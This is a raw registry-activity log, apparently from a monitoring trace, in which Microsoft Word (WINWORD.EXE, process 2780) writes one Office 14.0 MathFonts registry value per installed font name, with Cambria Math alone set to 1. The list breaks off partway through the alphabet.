HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DFKai-SB
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Dotum
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DotumChe
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@FangSong
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gulim
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GulimChe
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gungsuh
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GungsuhChe
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@KaiTi
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Malgun Gothic
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo UI
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft JhengHei
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft YaHei
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS-ExtB
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU-ExtB
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Gothic
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Mincho
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PGothic
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PMincho
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS UI Gothic
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@NSimSun
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU-ExtB
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimHei
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun-ExtB
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Agency FB
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aharoni
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Algerian
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Andalus
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Angsana New
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
AngsanaUPC
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aparajita
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arabic Typesetting
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Black
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Narrow
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Rounded MT Bold
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Unicode MS
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Baskerville Old Face
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Batang
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BatangChe
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bauhaus 93
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bell MT
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB Demi
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bernard MT Condensed
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Blackadder ITC
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Black
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Condensed
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Poster Compressed
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Book Antiqua
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookman Old Style
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookshelf Symbol 7
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bradley Hand ITC
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Britannic Bold
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Broadway
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Browallia New
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BrowalliaUPC
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Brush Script MT
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Californian FB
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calisto MT
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria Math
1
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Candara
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Castellar
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Centaur
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Gothic
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Schoolbook
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Chiller
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Colonna MT
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Comic Sans MS
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Consolas
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Constantia
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cooper Black
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Bold
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Light
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Corbel
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cordia New
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
CordiaUPC
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Courier
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Courier New
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Curlz MT
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DaunPenh
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
David
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DFKai-SB
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DilleniaUPC
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DokChampa
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Dotum
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DotumChe
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ebrima
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Edwardian Script ITC
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Elephant
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Engravers MT
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Bold ITC
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Demi ITC
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Light ITC
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Medium ITC
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Estrangelo Edessa
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
EucrosiaUPC
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Euphemia
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FangSong
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Felix Titling
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Fixedsys
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Footlight MT Light
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Forte
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Book
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi Cond
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Heavy
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium Cond
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FrankRuehl
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FreesiaUPC
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Freestyle Script
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
French Script MT
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gabriola
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Garamond
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gautami
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Georgia
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gigi
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Condensed
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Ext Condensed Bold
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold Condensed
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gisha
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gloucester MT Extra Condensed
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Old Style
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Stout
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gulim
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GulimChe
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gungsuh
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GungsuhChe
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Haettenschweiler
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harlow Solid Italic
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harrington
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
High Tower Text
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Impact
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Imprint MT Shadow
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Informal Roman
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
IrisUPC
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Iskoola Pota
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
JasmineUPC
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Jokerman
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Juice ITC
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KaiTi
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kalinga
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kartika
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Khmer UI
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KodchiangUPC
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kokila
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kristen ITC
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kunstler Script
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lao UI
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Latha
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Leelawadee
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Levenim MT
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
LilyUPC
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Bright
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Calligraphy
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Console
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Fax
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Handwriting
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Typewriter
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Unicode
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Magneto
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Maiandra GD
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Malgun Gothic
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mangal
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Marlett
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Matura MT Script Capitals
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo UI
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Himalaya
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft JhengHei
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft New Tai Lue
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft PhagsPa
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Sans Serif
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Tai Le
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Uighur
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft YaHei
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Yi Baiti
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS-ExtB
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU-ExtB
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam Fixed
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mistral
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Modern No. 20
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mongolian Baiti
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Monotype Corsiva
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MoolBoran
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Gothic
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Mincho
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Outlook
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PGothic
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PMincho
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Sans Serif
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Specialty
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Sans Serif
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Serif
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS UI Gothic
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MT Extra
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MV Boli
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Narkisim
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Engraved
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Solid
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
NSimSun
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Nyala
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
OCR A Extended
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Old English Text MT
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Onyx
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palace Script MT
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palatino Linotype
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Papyrus
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Parchment
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua Titling MT
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Plantagenet Cherokee
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Playbill
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU-ExtB
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Poor Richard
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Pristina
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
